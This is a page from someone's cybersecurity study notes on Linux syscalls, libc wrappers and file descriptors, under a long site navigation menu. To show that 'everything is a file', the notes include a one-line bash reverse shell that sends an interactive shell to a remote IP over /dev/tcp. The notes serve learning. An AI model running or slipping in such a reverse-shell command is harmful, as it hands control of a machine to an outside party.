📔
Cyber Security Notes
  • Introduction
  • CVEs
    • CVE-2022-33106
  • Paper Reviews
    • Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice
  • Security Basics Notes
    • Identification, Authentication and Authorization
  • Enumeration and Initial Compromise
    • Methodology
    • Footprinting
    • Network Protocols
      • FTP
      • SMB
      • DNS
      • NFS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
    • Nifty One Liners
    • Brute-Force Web Pages
      • Hydra
    • Network Pentest
      • Quick SMB cheatsheet
      • SSH keypair basics
      • Compromise using SSH Key
      • Networking fundamentals Interview topics
      • nmap quick cheatsheet
      • Metasploit Quick Reference
    • Web Pentest
      • Web Pentest Interview top topics
      • Wordpress Exploitation
      • Joomla Exploitation
      • Login Bypass using Cookie Tampering/Poisoning
      • Subdomain Enumeration
      • CSRF mitigation
      • XSS mitigation
      • CSP bypass with JSONP
      • PHP Vulnerabilities
      • Python Serialization Vulnerabilities - Pickle
      • SQL Injections
        • SQLmap
      • SSTI
      • XSS
    • Buffer Overflow Prep
      • Understanding CPUs
      • Virtual Memory and Paging
      • Syscalls
      • Theorem Proving
      • Stripping readable function names
      • Insecure C functions
      • Stack Canaries
      • Linking - GOT,PLT
      • Return Oriented Programming
    • Active Directory - Basics
      • AD DS
      • Managing OUs
      • Group Policies
      • Authentications
      • Trees, Forests and Trusts
      • Kerberos
      • Attacking Kerberos
      • Priv Esc (Post Exploitation)
    • DNS/Domain Enum Masterguide
  • Post Exploitation
    • Shell Escape Techniques
    • Getting stable shell after compromise
    • Linux Privilege Escalation
      • Sudoers file
      • Sudoers entry - Yum
      • Wildcards - Basics
      • Wildcards - Chown
      • Wildcards - Tar
      • Linux Permissions & SUID/SGID/Sticky Bit
      • SUID - nmap
      • SUID - bash
      • SUID - man
      • NFS no_root_squash
      • SUID - pkexec
      • Bad permissions
    • Windows Privilege Escalation
      • SeImpersonatePrivilege Token Impersonation
      • Firefox Creds
      • Potatoes
      • Print Spooler Basics
      • Print Spooler CVE 2020-1030
      • SpoolFool
    • Data Exfiltration Post Exploitation
  • Port Forwarding Cheatsheet
  • Powershell Essentials
    • Powershell Basics
    • Powershell Enumeration
    • Powershell Port Scanner
    • Powershell One Liner Port Scanning
    • Powershell Port Scan in a given CIDR
  • Application Security
    • System Calls in Linux
    • Buffer Overflow Defenses
    • Format string vulnerabilities
    • Sample Github Actions
    • Basic Bugs in Demo Application
    • Using AFL++
  • Linux 64-bit Assembly
    • GDB Basics
      • My relevant GDB cheatsheet
      • Task 1 - Tamper strcmp logic
      • Breakpoints
      • Always starting with intel flavor
      • GDB TUI Mode
    • Basic Hello World Program
    • Registers in 64-bit
    • global directive
    • Reducing instructions and Removing NULL-> Optimizing memory in Assembly
    • Data Types
    • Endianness
    • Moving Data
    • push, pop, and the stack
    • Analysis - Writing data on memory location and referencing
    • Arithmetic Operations
    • Bitwise Logical Operations
    • Bit-Shifting Operations
    • Control Instructions
    • Loops
    • Procedures
    • Stack-Frames and Procedures
    • String Operations
    • Shellcoding basics
      • Introduction and Common Rules
      • Basic Shellcodes->Exit
      • Testing shellcode->Skeleton Code
      • Techniques-> JMP,CALL,POP
      • Techniques-> Stack
      • Techniques-> (64-bit only) RIP Relative Addressing
      • Shellcode 1 -> execve(/bin/sh) STACK PUSH
      • Shellcode 1 -> execve(/bin/sh) JMP CALL POP
      • Techniques-> XOR-Encoder
  • Cloud Security
    • Foundational Technology
    • Learning Through Project Omega
    • IAM Essentials
      • Deep dive into IAM - Part 1
    • Amazon S3
    • Risk Management & Data Controls
    • Enumeration
      • S3 - Enum Basics - PwnedLabs
      • S3 - Identify the AWS Account ID from a Public S3 Bucket
      • EBS - Loot Public EBS Volumes
      • S3- Exploit Weak Bucket Policies for Privileged Access
  • API Security
    • WSDL
  • Reverse Engineering
    • Some string Operations
    • Numbers and Inputs
    • Address inputs
    • Recursive Function
    • Crackme: level1
    • Crackme: level2
    • CTF: Memory Dereferencing
    • CTF: Monty Python
  • CTF Challenge Learnings
    • vsCTF 2024
      • Sanity Check
      • not-quite-caesar
      • Intro to reversing
    • NCL Individual 2024
      • Web Challenges
        • PiratePals
        • Pierre's Store
    • Pico CTF 2024
      • Web Exploitation
        • Bookmarklet
        • WebDecode
        • Unminify
        • Trickster
      • General Skills
        • Commitment Issues
        • Time Machine
        • Blame Game
        • Collaborative Development
        • Binary Search
        • Dont-you-love-banners
    • Sunshine CTF
      • Knowledge Repository
    • Amazon WiCys CTF
      • I am Lazy
      • Password Locker on the Web
      • Happy Birthday Card Generator
      • Bloggergate
      • simple offer
      • Bad Actor
      • Secret Server
      • Simple PCAP
      • Hidden Message
    • C code using getenv()
    • Command Injection with filter
    • Pwning
      • Shoddy_CMP
      • PLT_PlayIT
  • Applied Cryptography
    • Linear Congruential Generator
  • Tools for everything
Powered by GitBook
On this page
  • Files
  • Standard File Descriptors

Was this helpful?

  1. Enumeration and Initial Compromise
  2. Buffer Overflow Prep

Syscalls

PreviousVirtual Memory and PagingNextTheorem Proving

Last updated 1 year ago

Was this helpful?

A user level program can't directly perform OS level activities like instruction the CPU to go to sector 57 of the HDD and start writing there.

But a user level program can use system calls to instruct an OS to perform certain things which are allowed. This is achieved using syscalls in Linux.

Instruction in x86_64 is "syscall". It is implemented by RAX and takes in arguments in rdi,rsi,rdx,r10,r8,r9

man syscalls

There are hundreds of these system calls for different functions.

Some OS level functionalities can be done by a user program without even using a syscall as well.

So, system call 0 would read. That is: RAX,0

But to do this in C would be a headache. Properly calling RAX,0 with necessary arguments in rdi,rsi etc. is difficult. So C language has wrappers for these system calls called "libc" which will setup a system call properly for you while writing a program

Example:

Here, syscall() is setting up an operation on /etc/passwd file. From the list, we see this is how paramters are setup:

%rdi => Filename: /etc/passwd

%rsi=>Flags: R/W/X/A?

%rdx=> mode of accessing of you're creating it for the first time. R/W/X?

%rax => 2

Let's disassemble this code:

Now even though the system call suggests rdi for filename, rsi for flags, rdx for mode and rax for system call number, we see something weird happening.

The order of assignment of these arguments is incorrect.

THis is because of the library wrapper

Since the library (syscall()) is taking in an extra number as input (first argument=2 here), taking in RDI, put that in RAX; then will take next one in RSI, put that in RDI and so on.

It shifts the call by one argument and makes the call

But the implementation remains the same.

Here, interesting thing to note is that syscall is returning a file descriptor which is an integer. So that when you tell it to write to file descriptor 20, it looks up wheteher you previously opened a file and it gave you back fd 20 and then writes to correct file. SO.....

Files

On Unix-like OS, everything is a file!

  • files

  • sockets

  • processes info (/proc)

  • attached devices (/dev)

  • system settings (/sys)

This makes it very nice to use basic tools like find, grep, awk to find what you need or we can use these files to even make remote connections!!

bash -i >& /dev/tcp/10.10.100.120/80 0>&1

Here, we are taking fd 0 input and redirecting to fd 1. It is redirecting whatever server sends on our terminal. How is this working?

Standard File Descriptors

Standard file descriptors:

  • 0: stdin->reading what user is inputting in the terminal

  • 1: stdout->printing to the terminal

  • 2: stderr->print to terminal an error message

When we are using "open" in a program, we get an fd back. This is a number used to ideentify the file. We can check them out: /proc/self/fd

Now, we can make a program and play with these file descriptors. If a program is throwing an error or writing something to the terminal, we can redirect it somewhere using FD.

Let's use FD to redirect thesee different write statements to different files. FD1 is redirecting first print statement to a file stdout.txt and stderr.txt using FD 2. When we are redirecting one FD, the other is printed normally.

This is useful especially when we are running a bash program (like find) and we have to redirect stderr somewhere to clean out the output a bit. We can redirect it to /dev/null which is a special file in Linux where you can throw all the junk and OS would never write anything to it. Sort of like disposing of waste output.

>& is bash feature to redirect both stdout and stderr to somewhere.

FD are program specific. So, 1 in my program won't conflict with another FD 1.

Searchable Linux Syscall Table for x86 and x86_64 | PyTux